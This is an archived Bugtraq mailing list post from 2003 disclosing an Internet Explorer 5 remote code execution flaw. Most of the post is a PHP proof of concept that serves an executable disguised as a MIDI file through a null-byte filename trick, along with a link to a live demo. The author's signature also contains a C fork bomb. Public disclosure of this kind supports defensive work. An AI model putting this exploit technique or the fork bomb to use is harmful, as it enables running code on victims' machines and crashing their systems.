Bugtraq mailing list archives
IE remote code execution
From: Marcin Ulikowski <r3b00t () tx pl>
Date: Sun, 19 Oct 2003 00:15:39 +0200 (CEST)
This code can execute any code remotely using IE - as you can see very simple. // for IE 5, tested on default Windows 98SE installation <?php Header("Content-type: audio/midi"); Header("Content-Disposition: inline; filename=readme.txt%00code.exe"); readfile("code.exe"); ?> <noscript> Here you have a demo: http://r3b00t.tx.pl/iexec5.php Can we expect more surprises like this one? -- ------------------------------ r3b00t ~ [http://r3b00t.tx.pl] just do main(){for(;;)fork();} ------------------------------
Current thread:
- IE remote code execution Marcin Ulikowski (Oct 20)
- Re: IE remote code execution Jouko Pynnonen (Oct 20)
- <Possible follow-ups>
- Re: IE remote code execution K-OTiK Security (Oct 20)
- RE: IE remote code execution Thor Larholm (Oct 21)